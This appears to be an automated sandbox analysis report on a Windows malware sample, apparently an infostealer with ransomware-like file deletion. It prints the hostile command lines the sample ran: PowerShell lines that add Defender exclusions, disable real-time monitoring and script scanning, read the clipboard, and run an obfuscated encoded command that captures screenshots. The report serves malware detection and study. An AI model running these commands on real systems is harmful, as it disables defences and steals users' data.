Source: based.exe, 00000004.00000002.2383024745.00000201D0940000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: based.exe, 00000004.00000003.1857154542.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382426374.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383270970.00000201D0BF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: based.exe, 00000004.00000002.2383124519.00000201D0A44000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: based.exe, 00000004.00000003.1856925245.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1868825454.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: based.exe, 00000004.00000002.2381065768.00000201CE28F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gstatic.com/generate_204
Source: based.exe, 00000004.00000003.1857154542.00000201D075A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382426374.00000201D075A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: based.exe, 00000004.00000003.1878813460.00000201D0EC2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2386609527.00000201D1138000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000003.2358122720.00000201D0EC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: based.exe, 00000004.00000002.2387954402.00000201D1C28000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: powershell.exe, 00000011.00000002.1984485852.0000028A4B4B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: hacn.exe, 00000003.00000002.1735603222.00007FFDFB78F000.00000002.00000001.01000000.0000000B.sdmp, based.exe, 00000004.00000002.2394342718.00007FFDFB31F000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://python.org/dev/peps/pep-0263/
Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.png
Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: based.exe, 00000004.00000003.1852139141.00000201D081F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: based.exe, 00000004.00000003.1793100098.00000201D0D3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1755320841.00000201D0C99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: based.exe, 00000004.00000003.1857154542.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382426374.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1745863108.00000201D0CA5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1755320841.00000201D0C99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: based.exe, 00000004.00000003.1793100098.00000201D0D3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: based.exe, 00000004.00000002.2387215842.00000201D157E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2357805259.00000201D0F1C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2387215842.00000201D1569000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: based.exe, 00000004.00000003.2358410623.00000201D0E91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: based.exe, 00000004.00000002.2387215842.00000201D157E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2357805259.00000201D0F1C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2387215842.00000201D1569000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: based.exe, 00000004.00000003.2358410623.00000201D0E91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: based.exe, 00000004.00000002.2381065768.00000201CE28F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: based.exe, 00000004.00000003.1856925245.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1868825454.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: based.exe, 00000004.00000002.2383270970.00000201D0BF5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383124519.00000201D0A44000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: based.exe, 00000004.00000002.2386503993.00000201D0F40000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383024745.00000201D0940000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: based.exe, 00000004.00000002.2386503993.00000201D0F40000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningse=Lax0
Source: based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: based.exe, 00000004.00000002.2386609527.00000201D10B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.ca/
Source: based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
Source: based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000002.2386609527.00000201D1040000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.fr/
Source: based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684490316.000001F919A1D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1683685878.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/
Source: based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: based.exe, 00000004.00000002.2386609527.00000201D10B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: based.exe, 00000004.00000003.1834359587.00000201D0CFD000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383124519.00000201D0A44000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000002.2386609527.00000201D1114000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000003.1852139141.00000201D081F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1852062681.00000201D0CFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: based.exe, 00000004.00000003.1755320841.00000201D0C99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: based.exe, 00000004.00000003.1793100098.00000201D0D3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: based.exe, 00000004.00000003.1755320841.00000201D0C99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: based.exe, 00000004.00000003.1793100098.00000201D0D3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: based.exe, 00000004.00000003.1755320841.00000201D0C99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: based.exe, 00000004.00000003.1793100098.00000201D0D3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: based.exe, 00000004.00000003.1793100098.00000201D0D3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1755320841.00000201D0C99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: based.exe, 00000004.00000003.1818589198.00000201D08D5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1761254313.00000201D08D4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D08D5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D08D5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1857154542.00000201D08D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
Source: based.exe, 00000004.00000003.1755320841.00000201D0CA3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1764789844.00000201D0CA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
Source: based.exe, 00000004.00000003.1793100098.00000201D0D3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: based.exe, 00000004.00000002.2386609527.00000201D1114000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2394059861.00007FFDFAFB6000.00000004.00000001.01000000.00000019.sdmp, based.exe, 00000004.00000002.2392435887.00007FFDFAC52000.00000004.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: hacn.exe, 00000001.00000003.1670114307.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1674833152.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690904651.000002075D06D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/dev/peps/pep-0205/
Source: hacn.exe, 00000003.00000002.1724401558.000002075D178000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382218534.00000201D0540000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: based.exe, 00000004.00000003.1856925245.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1868825454.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: based.exe, 00000004.00000003.1856925245.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1868825454.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Recovery\HpQPPZazcv.exe	Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\ProgramData\Microsoft\based.exe	File deleted: C:\Users\user\AppData\Local\Temp\? ? ? ?\Common Files\Desktop\WUTJSCBCFX.png	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File deleted: C:\Users\user\AppData\Local\Temp\? ? ? ?\Common Files\Desktop\LTKMYBSEYZ.jpg	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File deleted: C:\Users\user\AppData\Local\Temp\? ? ? ?\Common Files\Desktop\UOOJJOZIRH.mp3	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File deleted: C:\Users\user\AppData\Local\Temp\? ? ? ?\Common Files\Desktop\KZWFNRXYKI.jpg	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File deleted: C:\Users\user\AppData\Local\Temp\? ? ? ?\Common Files\Desktop\UMMBDNEQBN.jpg	Jump to behavior

System Summary

Very long command line found

Source: C:\ProgramData\Microsoft\based.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Writes or reads registry keys via WMI

Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgAC